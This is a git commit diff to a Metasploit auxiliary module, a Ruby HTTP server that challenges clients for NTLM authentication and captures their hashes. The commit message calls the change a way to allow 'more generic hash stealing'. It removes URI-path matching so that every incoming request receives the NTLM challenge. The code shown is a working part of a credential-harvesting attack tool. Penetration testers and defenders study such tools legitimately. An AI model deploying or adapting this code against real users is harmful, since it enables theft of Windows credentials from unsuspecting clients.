don't respond with 404's for requests that don't match the URIPATH exactly. allows for more generic hash stealing and fixes 3442
git-svn-id: file:///home/svn/framework3/trunk@11576 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
0158cd28f1
commit
f2661e68db
|
@ -65,31 +65,23 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def on_request_uri(cli, request)
|
||||
print_status("Request '#{request.uri}' from #{cli.peerhost}:#{cli.peerport}")
|
||||
case request.uri
|
||||
when %r{^#{datastore['URIPATH']}.*sessid=}
|
||||
send_not_found(cli)
|
||||
when self.get_resource
|
||||
# If the host has not started auth, send 401 authenticate with only the NTLM option
|
||||
if(!request.headers['Authorization'])
|
||||
response = create_response(401, "Unauthorized")
|
||||
response.headers['WWW-Authenticate'] = "NTLM"
|
||||
cli.send_response(response)
|
||||
else
|
||||
method,hash = request.headers['Authorization'].split(/\s+/,2)
|
||||
# If the method isn't NTLM something odd is goign on. Regardless, this won't get what we want, 404 them
|
||||
if(method != "NTLM")
|
||||
print_status("Unrecognized Authorization header, responding with 404")
|
||||
send_not_found(cli)
|
||||
return false
|
||||
end
|
||||
|
||||
response = handle_auth(cli,hash)
|
||||
cli.send_response(response)
|
||||
end
|
||||
else
|
||||
print_status("Responding with 404")
|
||||
# If the host has not started auth, send 401 authenticate with only the NTLM option
|
||||
if(!request.headers['Authorization'])
|
||||
response = create_response(401, "Unauthorized")
|
||||
response.headers['WWW-Authenticate'] = "NTLM"
|
||||
cli.send_response(response)
|
||||
else
|
||||
method,hash = request.headers['Authorization'].split(/\s+/,2)
|
||||
# If the method isn't NTLM something odd is goign on. Regardless, this won't get what we want, 404 them
|
||||
if(method != "NTLM")
|
||||
print_status("Unrecognized Authorization header, responding with 404")
|
||||
send_not_found(cli)
|
||||
return false
|
||||
end
|
||||
|
||||
response = handle_auth(cli,hash)
|
||||
cli.send_response(response)
|
||||
end
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue